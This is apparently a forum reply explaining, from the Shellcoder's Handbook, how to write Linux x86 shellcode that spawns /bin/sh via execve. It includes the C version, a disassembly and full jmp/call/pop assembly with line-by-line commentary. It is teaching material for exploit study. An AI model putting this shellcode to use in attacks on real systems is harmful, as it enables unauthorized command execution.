Hi again,
I was going to try to type out an excerpt from the shellcoder's handbook, but it is multiple pages long. This was a Good Thing because it forced me to understand it prior to posting here :-) I havn't done so previously because I'm focusing on the reversing course that I'm doing at the moment.
Anyway, In summary:
We want to spawn a shell by calling
execve ('/bin/sh','/bin/sh',null);
So first we write what we want to do in c (this is code from the book):
#include <stdio.h>
int main()
{
char *happy[2];
happy[0] = "/bin/sh";
happy[1] = null;
execve (happy[0],happy,null);
}
Next we disassemble it and take a look at the execve call (this is cut down to show the parameters and the call itself, but it's good to look at the entire function):
804e15b: 8b 5d 08 mov 0x8(%ebp),%ebx
<snip>
804e165: 8b 4d 0c mov 0xc(%ebp),%ecx
804e168: 8b 55 10 mov 0x10(%ebp),%edx
804e16b: b8 0b 00 00 00 mov $0xb,%eax
804e170: cd 80 int $0x80
As you can see, int 80 performs the syscall which is stored in eax (execve is 0xb) and takes three arguments, passed in via the registers ebx, ecx and edx (fastcall convention).
The problem with simply taking the disassembly and removing null bytes is that there are a lot of hard-coded addresses in there - which, as you've found, are difficult to deal with.
So we need a way to make it so we can reference everything via relative addressing.
The simplest way to do this is to have our shellcode execute in it's own stack frame that we can control. The idea is that we start the shellcode off with a call and then go from there.
Here's the assembly code from the book (sorry for the intel syntax):
Section .text
global _start
_start:
jmp short gotocall
shellcode:
pop esi
xor eax, eax
mov byte [esi+7], al
lea ebx, [esi]
mov long [esi +8], ebx
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi +12]
int 0x80
gotocall:
call shellcode
db '/bin/shABBBBCCCC'
When the call instruction is executed, the instruction immediately following is placed on the stack. We've included some padding in the db (define byte) instruction in order to make room for the extra parameters in our call to execve.
Next we pop esi to get the address of our '/bin/shABBBBCCCC' string into the ESI register - now we can reference this as offsets from ESI.
xor eax, eax
sets eax to null.
mov byte [esi+7], al
places a null over the 7th byte in our string the "A"
lea ebx, [esi]
places our string into ebx
mov long [esi +8], ebx
moves our string into the address at esi+8. our string now should look like: '/bin/sh./bin/shCCCC' with the "." representing a null
mov long [esi + 12], eax
This moves null (eax was xor'd previously) into the last part of our string
Now we set up ready for the interrupt 80:
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi +12]
At this point - EAX will contain 00 00 00 0b
EBX will contain a pointer to the string '/bin/sh'
Ecx will also contain a pointer to the string '/bin/sh'
And edx will contain a pointer to a null
Then we execute the interrupt.
int 0x80
So you merely have to compile that assembly and extract the opcodes.
hope that helps -